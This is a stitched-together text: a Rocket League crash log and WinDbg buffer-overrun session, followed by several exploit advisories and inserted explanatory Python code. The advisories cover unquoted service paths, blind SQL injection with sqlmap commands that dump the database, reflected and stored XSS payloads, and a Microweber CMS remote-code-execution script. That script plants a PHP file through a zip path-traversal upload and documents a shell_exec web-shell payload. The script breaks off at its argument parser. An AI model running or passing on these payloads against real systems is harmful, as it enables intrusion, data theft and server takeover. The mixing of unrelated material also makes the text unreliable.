[0188.65] Warning: Warning, Detected data corruption [incorrect uncompressed size] calculated 1094795585 bytes, requested 2549 bytes at offset 135132 from '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'. Please delete file and recook.
[0188.65] Critical: Error reentered: I/O failure operating on '..\..\TAGame\CookedPCConsole\hat_Headphones_SF.upk'
[0188.66] DevBeacon: FWebSocket::ReadCloseReason this=000002B686633200 received opcode CLOSE. Code=1000 Reason=IdleTimeout
[0188.66] DevOnline: EOSSDK-LogEOS: Large tick time detected 22.5409

hat_peanut_SF.upk:
------------------

...
...
0:077> g
(3568.230c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
VCRUNTIME140!memcmp+0xee:
00007ffe`afc812de f3a4            rep movs byte ptr [rdi],byte ptr [rsi]
0:000> r
rax=0000009852afeaf8 rbx=000001a1cc362268 rcx=ffffffff9c71eae4
rdx=0000010951ea4107 rsi=000001a1a49a4107 rdi=0000009852b00000
rip=00007ffeafc812de rsp=0000009852afe9c8 rbp=ffffffff9c71ffec
 r8=ffffffff9c71ffec  r9=00000000000000ff r10=000001a1a49a2bff
r11=0000009852afeaf8 r12=0000000000000000 r13=0000000000000000
r14=0000009852afeaf8 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
VCRUNTIME140!memcmp+0xee:
00007ffe`afc812de f3a4            rep movs byte ptr [rdi],byte ptr [rsi]
0:000> g
(3568.230c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!)
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
RocketLeague!AK::MemoryMgr::GetPoolName+0x84164:
00007ff6`4a660424 cd29            int     29h
0:000> .exr -1
ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164)
   ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
  ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 0000000000000002
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
0:000> u 00007ff64a660424
RocketLeague!AK::MemoryMgr::GetPoolName+0x84164:
00007ff6`4a660424 cd29            int     29h
00007ff6`4a660426 488d0d3303f600  lea     rcx,[RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d678 (00007ff6`4b5c0760)]
00007ff6`4a66042d e8ca010000      call    RocketLeague!AK::MemoryMgr::GetPoolName+0x8433c (00007ff6`4a6605fc)
00007ff6`4a660432 488b442438      mov     rax,qword ptr [rsp+38h]
00007ff6`4a660437 4889051a04f600  mov     qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d770 (00007ff6`4b5c0858)],rax
00007ff6`4a66043e 488d442438      lea     rax,[rsp+38h]
00007ff6`4a660443 4883c008        add     rax,8
00007ff6`4a660447 488905aa03f600  mov     qword ptr [RocketLeague!AK::IAkStreamMgr::m_pStreamMgr+0x1d710 (00007ff6`4b5c07f8)],rax
0:000> kb 10
 # RetAddr               : Args to Child                                                                    : Call Site
00 00007ff6`4a65fdcf     : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164
01 00007ffe`d735207f     : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f
02 00007ffe`d7301454     : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf
03 00007ffe`d7350bae     : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244
04 00007ffe`afc812de     : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e
05 00007ff6`4948a38b     : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe [d:\agent\_work\1\s\src\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 114]
06 00007ff6`494fe648     : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b
07 00007ff6`494e3e65     : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8
08 fab8446d`6e5edd60     : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5
09 efaf2dc5`69758c3e     : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60
0a fab8446d`6e5edd60     : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e
0b efaf2dc5`69758c3e     : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60
0c fab8446d`6e5edd60     : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e
0d efaf2dc5`69758c3e     : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60
0e fab8446d`6e5edd60     : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e
0f efaf2dc5`69758c3e     : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60
0:000> !analyze -m
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

KEY_VALUES_STRING: 1

    Key  : Analysis.CPU.mSec
    Value: 5640

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 6467

    Key  : Analysis.Init.CPU.mSec
    Value: 400749

    Key  : Analysis.Init.Elapsed.mSec
    Value: 1699165

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 261

    Key  : FailFast.Name
    Value: STACK_COOKIE_CHECK_FAILURE

    Key  : FailFast.Type
    Value: 2

    Key  : Timeline.OS.Boot.DeltaSec
    Value: 215108

    Key  : Timeline.Process.Start.DeltaSec
    Value: 1744

    Key  : WER.OS.Branch
    Value: vb_release

    Key  : WER.OS.Timestamp
    Value: 2019-12-06T14:06:00Z

    Key  : WER.OS.Version
    Value: 10.0.19041.1

    Key  : WER.Process.Version
    Value: 1.0.10897.0

NTGLOBALFLAG:  0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS:  0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164)
   ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
  ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 0000000000000002
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE

FAULTING_THREAD:  0000230c
PROCESS_NAME:  RocketLeague.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE_STR:  c0000409
EXCEPTION_PARAMETER1:  0000000000000002

STACK_TEXT:
00000098`52afda90 00007ff6`4a65fdcf     : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164
00000098`52afdad0 00007ffe`d735207f     : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f
00000098`52afdb00 00007ffe`d7301454     : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf
00000098`52afdb30 00007ffe`d7350bae     : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244
00000098`52afe240 00007ffe`afc812de     : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e
00000098`52afe9c8 00007ff6`4948a38b     : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe
00000098`52afe9e0 00007ff6`494fe648     : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b
00000098`52afea20 00007ff6`494e3e65     : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8
00000098`52afeab0 fab8446d`6e5edd60     : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5
...
...

STACK_COMMAND:  ~0s ; .cxr ; kb
SYMBOL_NAME:  RocketLeague!AK::MemoryMgr::GetPoolName+84164
MODULE_NAME: RocketLeague
IMAGE_NAME:  RocketLeague.exe
FAILURE_BUCKET_ID:  FAIL_FAST_STACK_BUFFER_OVERRUN_STACK_COOKIE_CHECK_FAILURE_MISSING_GSFRAME_c0000409_RocketLeague.exe!AK::MemoryMgr::GetPoolName
OS_VERSION:  10.0.19041.1
BUILDLAB_STR:  vb_release
OSPLATFORM_TYPE:  x64
OSNAME:  Windows 10
IMAGE_VERSION:  1.0.10897.0
FAILURE_ID_HASH:  {3e6f3f5b-25bb-68b3-2a5b-232743df7884}
Followup:     MachineOwner
-
DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path
# Exploit Title: DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-07
# Vendor Homepage: https://www.weird-solutions.com
# Software : https://www.weird-solutions.com/download/products/dhcpbbv4_retail_x64.exe
# Tested Version: 4.1.0.1503
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DHCP"

DHCP Broadband 4    DHCP Broadband 4    C:\Program Files\DHCP Broadband 4\dhcpt.exe    Auto

# Service info

C:\>sc qc "DHCP Broadband 4"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: DHCP Broadband 4
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\DHCP Broadband 4\dhcpt.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : DHCP Broadband 4
        DEPENDENCIAS       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
-
PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection
# Exploit Title: PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection
# Date: 03.05.2021
# Exploit Author: Tyler Butler
# Vendor Homepage: http://timeclock.sourceforge.net
# Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
# Version: 1.04
# Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5

Description:
PHP Timeclock is vulnerable to both Boolean and Time Based SQL Injection on login.php via the login_userid parameter. This PoC shows how SQLmap can be used to exploit this vulnerability to dump database contents.

Boolean Based Payload:
user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass

Time Based Payload:
user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass

Steps to reproduce:
1. Run sqlmap against an instance of PHP Timeclock
2. Follow the instructions below for specific versions of MySQL

MySQL >= 5.0.12:

$ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --dbms=MySQL --technique=TB --current-db

---
Parameter: login_userid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: login_userid=user' AND (SELECT 4247 FROM (SELECT(SLEEP(5)))ztHm) AND 'WHmv'='WHmv&login_password=pass
---

MySQL < 5:
On versions using MySQL < 5, table names must be included as arguments, as information_schema was not yet introduced into MySQL.

$ sqlmap -u http://localhost/login.php --method POST --data "login_userid=user&login_password=pass" -p login_userid --not-string="Warning" --technique=B -D timeclock -T employees, -C empfullname --dump --dbms=MySQL -v

---
Parameter: login_userid (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: login_userid=user' RLIKE (SELECT (CASE WHEN (8535=8535) THEN 0x75736572 ELSE 0x28 END))-- QwMo&login_password=pass
---
-
BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path
# Exploit Title: BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-07
# Vendor Homepage: https://www.weird-solutions.com
# Software : https://www.weird-solutions.com/download/products/bootpt_demo_x64.exe
# Tested Version: 2.0.0.1253
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BOOTP"

BOOTP Turbo    BOOTP Turbo    C:\Program Files\BOOTP Turbo\bootpt.exe    Auto

# Service info

C:\>sc qc "BOOTP Turbo"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: BOOTP Turbo
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\BOOTP Turbo\bootpt.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : BOOTP Turbo
        DEPENDENCIAS       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
This vulnerability could permit executing code during startup or reboot with escalated privileges.
TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path
# Exploit Title: TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-05-07
# Vendor Homepage: https://www.weird-solutions.com
# Software : https://www.weird-solutions.com/download/products/tftpbbv4_retail_x64.exe
# Tested Version: 4.3.0.1465
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:

C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "tftpt"

TFTP Broadband 4    TFTP Broadband 4    C:\Program Files\TFTP Broadband 4\tftpt.exe    Auto

# Service info

C:\> sc qc "TFTP Broadband 4"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TFTP Broadband 4
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\TFTP Broadband 4\tftpt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TFTP Broadband 4
        DEPENDENCIES       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        SERVICE_START_NAME : LocalSystem

# Exploit:
As with the BOOTP Turbo service above, the path is unquoted, the service is AUTO_START and it runs as LocalSystem. Windows resolves the unquoted path by trying C:\Program.exe, then C:\Program Files\TFTP.exe, then C:\Program Files\TFTP Broadband.exe before the real binary; a local user who can create one of those files gets it executed as SYSTEM at startup or on service restart. Whether a standard user can write to those locations depends on the machine's ACLs, which the default installation does not grant.
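The two Weird Solutions advisories above show the discovery commands but not the path-resolution rule that makes an unquoted path exploitable. The following is an added example, not code from either advisory or from the vendor: it models the order in which Windows probes an unquoted service path (each space is a candidate end of the executable name, and the loader tries them left to right), and builds the sc.exe remediation command. The service names and paths come from the advisories; the logic is the generic CreateProcess behaviour, not something the page measured.

```python
"""Added example (not from the BOOTP Turbo / TFTP Broadband advisories):
model the search order Windows applies to an unquoted service binary path."""


def hijack_candidates(image_path: str) -> list:
    """Return, in probe order, the executables the service control manager
    would try before the intended one when the path is unquoted.
    A quoted path, or one without spaces, yields an empty list."""
    path = image_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        # A prefix that already names an .exe is the intended binary and
        # everything after it is an argument, so the probing stops there.
        if prefix.lower().endswith(".exe"):
            break
        candidates.append(prefix + ".exe")
    return candidates


def sc_fix_command(service_name: str, image_path: str) -> str:
    r"""The remediation: re-register the binary path wrapped in quotes.
    The \" escapes survive cmd.exe's argument parsing, so the registry value
    ends up as "C:\Program Files\...\x.exe" including the quotes."""
    bare = image_path.strip().strip('"')
    return f'sc config "{service_name}" binPath= "\\"{bare}\\""'


if __name__ == "__main__":
    services = [
        ("BOOTP Turbo", r"C:\Program Files\BOOTP Turbo\bootpt.exe"),
        ("TFTP Broadband 4", r"C:\Program Files\TFTP Broadband 4\tftpt.exe"),
    ]
    for name, path in services:
        print(f"{name}: would probe {hijack_candidates(path)}")
        print(f"  fix: {sc_fix_command(name, path)}")
```

Each candidate is only useful to an attacker if its parent directory is writable; on a default Windows 10 install neither C:\ (file creation) nor C:\Program Files\ is writable by standard users, so the icacls check on those directories decides whether a finding like this is a real local privilege escalation.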
PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)
# Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)
# Date: May 3rd 2021
# Exploit Author: Tyler Butler
# Vendor Homepage: http://timeclock.sourceforge.net
# Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
# Version: 1.04
# Tested on: PHP 4.4.9/5.3.3, Apache 2.2, MySQL 4.1.22/5

Description:
PHP Timeclock version 1.04 (and prior) suffers from multiple cross-site scripting vulnerabilities.

#1: Unauthenticated Reflected XSS
Arbitrary JavaScript can be injected into the application by appending a terminating /'> and the payload directly to the end of the GET request URL. The vulnerable paths are (1) /login.php, (2) /timeclock.php, (3) /reports/audit.php and (4) /reports/timerpt.php.

Payload: /'><svg/onload=alert`xss`>
Example: http://target/login.php/'%3E%3Csvg/onload=alert%60xss%60%3E

Steps to reproduce:
1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
2. Make a GET request to one of the four resources mentioned above
3. Append /'> and the payload to the end of the request
4. Submit the request and observe payload execution

#2: Unauthenticated Reflected XSS
Arbitrary JavaScript can be injected into the application in POST requests to (1) /reports/audit.php, (2) /reports/total_hours.php and (3) /reports/timerpt.php via the from_date and to_date parameters.

# Example:
POST /reports/audit.php HTTP/1.1
Host: localhost
Content-Length: 98
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/reports/audit.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=62cfcffbd929595ba31915b4d8f01d7d; remember_me=foo
Connection: close

date_format=M%2Fd%2Fyyyy&from_date=5%2F2%2F2021'><svg/onload=alert`xss`>&to_date=5%2F18%2F2021&csv=0&submit.x=40&submit.y=5

Payload: '><svg/onload=alert`xss`>

Steps to reproduce:
1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
2. Create a report at one of the vulnerable directories noted above
3. Intercept the request with a proxy tool like Burp Suite
4. Inject the payload into the from_date or to_date field
Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)
# Exploit Title: Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)
# Date: 04-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
# Version: 0.1
# Tested on: PHP 7.4.11, Linux x64_x86

# --- Description --- #
# The web application allows an Assistant to inject a persistent cross-site scripting payload which is executed in both the Assistant and the Super Admin panel.

# --- Proof of concept --- #
1. Log in as Assistant and go to: http://localhost/code/Admin_Dashboard/Add_employee.php
2. Click on the Add Employee button
3. Inject this payload into the First Name input: <script>alert('xss')</script>
4. Fill in the other inputs as you want (other inputs might be vulnerable as well), then click on the Save button.
5. Refresh the page and the XSS popup will be triggered.
6. Now, if the Super Admin visits this page in his/her dashboard: http://localhost/code/Superadmin_Dashboard/Add_employee.php
7. Our XSS payload will be executed in the Super Admin's browser.

** An attacker can use this vulnerability to take over the Super Admin account **
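Both the PHP Timeclock reflected XSS and the HRIS stored XSS above come down to one omission: a request value written into HTML without output encoding. The following is an added example, not code from either project: a constructed stand-in for the two injection contexts the advisories hit (an attribute, where the '> prefix of the Timeclock payload closes the quote and the tag, and element text, where the HRIS <script> lands as-is), each rendered with and without escaping, plus the check a test suite would use to tell the two apart. That the Timeclock pages reflect the request path into a form action is an assumption made here for illustration; the real markup is not on the page.

```python
"""Added example, not code from PHP Timeclock or the HRIS project:
attribute-context and text-context XSS beside their escaped forms."""
import html
import re

# The advisories' own payloads, used here as constructed test inputs
REFLECTED_PATH = "/login.php/'><svg/onload=alert`xss`>"
STORED_NAME = "<script>alert('xss')</script>"


def render_form(request_path: str, safe: bool) -> str:
    """Attribute context. Assumed reflection point for vector #1: the page writes
    the request path into its form action. Unescaped, the leading ' closes the
    attribute, > closes the tag, and <svg onload> is parsed as a new element."""
    value = html.escape(request_path, quote=True) if safe else request_path
    return f"<form method='post' action='{value}'>"


def render_cell(first_name: str, safe: bool) -> str:
    """Text context: the stored First Name echoed into an employee table cell."""
    value = html.escape(first_name) if safe else first_name
    return f"<td>{value}</td>"


# Start tags only; the tag name is captured so template-owned tags can be excluded
TAG_RE = re.compile(r"<([A-Za-z][A-Za-z0-9]*)[^>]*>")


def injected_tags(rendered: str, template_tags) -> list:
    """Start tags in the output that the template itself did not emit.
    A non-empty result means the input reached the HTML parser as markup."""
    return [m.group(0) for m in TAG_RE.finditer(rendered)
            if m.group(1).lower() not in template_tags]


if __name__ == "__main__":
    for label, out, owned in (
        ("reflected, raw", render_form(REFLECTED_PATH, safe=False), {"form"}),
        ("reflected, escaped", render_form(REFLECTED_PATH, safe=True), {"form"}),
        ("stored, raw", render_cell(STORED_NAME, safe=False), {"td"}),
        ("stored, escaped", render_cell(STORED_NAME, safe=True), {"td"}),
    ):
        print(f"{label}: {out}")
        print(f"    injected tags: {injected_tags(out, owned)}")
```

html.escape(value, quote=True) is the Python equivalent of PHP's htmlspecialchars($value, ENT_QUOTES, 'UTF-8'); the ENT_QUOTES part matters because the Timeclock payload only needs a single quote to escape a single-quoted attribute, and the default htmlspecialchars flags leave single quotes alone on older PHP releases. Encoding must match the context the value is written into: this escaping is right for element text and quoted attributes, but not for a value dropped inside a script block or a URL.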
Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)
# Exploit Title: Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)
# Date: 2020-10-31
# Exploit Author: sl1nki
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber/tree/1.1.20
# Version: <=1.1.20
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-28337
#
# Example usage with default phpinfo() payload:
# ./microweber_rce.py \
#   --hostname "http://microwebertest.com" \
#   --username "admin" \
#   --password "password123"
#
# Example usage with custom payload (shell_exec):
# ./microweber_rce.py \
#   --hostname "http://microwebertest.com" \
#   --username "admin" \
#   --password "password123" \
#   --payload '<?php if (isset($_REQUEST["fexec"])) {echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";} ?>'
#
# Notes:
# * SSL verification is disabled by default
# * If for some reason the --target-path "/userfiles/cache/" doesn't work, "/userfiles/modules/" is a good one too.
#
#!/usr/bin/python3

import argparse
import re
import requests
import sys
import zipfile
from io import BytesIO

# Disable insecure SSL warnings
requests.packages.urllib3.disable_warnings()


class Microweber():
    def __init__(self, baseUrl, proxies=None):
        self.baseUrl = baseUrl
        self.proxies = proxies
        self.cookies = None
        self.loginUrl = "/api/user_login"
        self.uploadUrl = "/plupload"
        self.moveZipToBackupUrl = "/api/Microweber/Utils/Backup/move_uploaded_file_to_backup"
        self.restoreBackupUrl = "/api/Microweber/Utils/Backup/restore"
        self.targetPath = "/userfiles/cache/"
        self.targetFilename = "payload.php"
        self.zipPayloadName = "payload.zip"

    def makePostRequest(self, url, data=None, files=None, headers=None):
        return requests.post(self.baseUrl + url,
                             data=data,
                             files=files,
                             headers=headers,
                             cookies=self.cookies,
                             proxies=self.proxies,
                             verify=False)

    def makeGetRequest(self, url, params=None):
        # Parameters travel in the query string but the request is sent as a POST,
        # as in the original exploit; the Microweber endpoints answer either way
        return requests.post(self.baseUrl + url,
                             params=params,
                             cookies=self.cookies,
                             proxies=self.proxies,
                             verify=False)

    def login(self, username, password):
        res = self.makePostRequest(self.loginUrl, data={
            "username": username,
            "password": password
        })
        if res.status_code == 200 and 'success' in res.json() and res.json()['success'] == "You are logged in!":
            print(f"[+] Successfully logged in as {username}")
            self.cookies = res.cookies
        else:
            print(f"[-] Unable to login. Status Code: {res.status_code}")
            sys.exit(-1)

    def createZip(self, path=None, filename=None, payload=None):
        # In-memory adaptation of ptoomey3's evilarc
        # https://github.com/ptoomey3/evilarc
        if payload is None:
            payload = "<?php phpinfo(); ?>"
        zd = BytesIO()
        zf = zipfile.ZipFile(zd, "w")
        # The custom Unzip class uses a path under the webroot for cached file extraction
        # /storage/cache/backup_restore/<md5 hash>/
        # so moving up 4 directories puts us at the webroot
        zf.writestr(f"../../../..{path}{filename}", payload)
        zf.close()
        return zd

    def uploadZip(self, zipData):
        # Upload the zip data as a general file
        res = self.makePostRequest(self.uploadUrl,
                                   headers={"Referer": ""},
                                   data={
                                       "name": self.zipPayloadName,
                                       "chunk": 0,
                                       "chunks": 1
                                   },
                                   files={"file": (self.zipPayloadName, zipData.getvalue(), "application/zip")})
        if res.status_code == 200:
            print(f"[+] Successfully uploaded: {self.zipPayloadName}")
            j = res.json()
            print(f"[+] URL: {j['src']}")
            print(f"[+] Resulting Filename: {j['name']}")
            self.zipPayloadName = j['name']
        else:
            print(f"[-] Unable to upload: {self.zipPayloadName} (Status Code: {res.status_code})")
            sys.exit(-1)

    def getAbsoluteWebRoot(self):
        # Determine the webroot using the debug output and the DefaultController.php path
        res = self.makeGetRequest("", params={"debug": "true"})
        if res.status_code != 200:
            print(f"[-] Unable to collect debug information. Bad server response: {res.status_code}")
            sys.exit(-1)
        target = "src/Microweber/Controllers/DefaultController.php"
        m = re.findall(r'([\/\w]+)\/src\/Microweber\/Controllers\/DefaultController\.php', res.text)
        if len(m) == 1:
            return m[0]
        else:
            print(f"[-] Unable to determine the webroot using {target}. Found {len(m)} matches")
            sys.exit(-1)

    def moveZipToBackup(self):
        # Move the uploaded zip file into the backup directory
        webRoot = self.getAbsoluteWebRoot()
        hostname = self.baseUrl.split("//")[1]
        src = f"{webRoot}/userfiles/media/{hostname}/{self.zipPayloadName}"
        res = self.makeGetRequest(self.moveZipToBackupUrl, params={"src": src})
        if res.status_code == 200 and 'success' in res.json() and res.json()['success'] == f"{self.zipPayloadName} was uploaded!":
            print(f"[+] Successfully moved {self.zipPayloadName} to backup")
        else:
            print(f"[-] Unable to move zip to backup ({res.status_code})")
            sys.exit(-1)

    def restoreBackup(self, filename):
        # With the zip file in the backup directory, 'restore' it, which will cause it to be extracted unsafely
        res = self.makePostRequest(self.restoreBackupUrl, data={"id": filename})
        if res.status_code == 200 and "Backup was restored!" in res.text:
            print(f"[+] Successfully restored backup {filename}")
        else:
            print(f"[-] Unable to restore backup {filename}")
            sys.exit(-1)

    def exploit(self, payload=None):
        zipData = self.createZip(self.targetPath, self.targetFilename, payload=payload)
        self.uploadZip(zipData)
        self.moveZipToBackup()
        self.restoreBackup(self.zipPayloadName)
        print(f"[+] Successfully uploaded payload to {self.targetFilename}!")
        print(f"[+] Visit: {self.baseUrl}{self.targetPath}{self.targetFilename}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
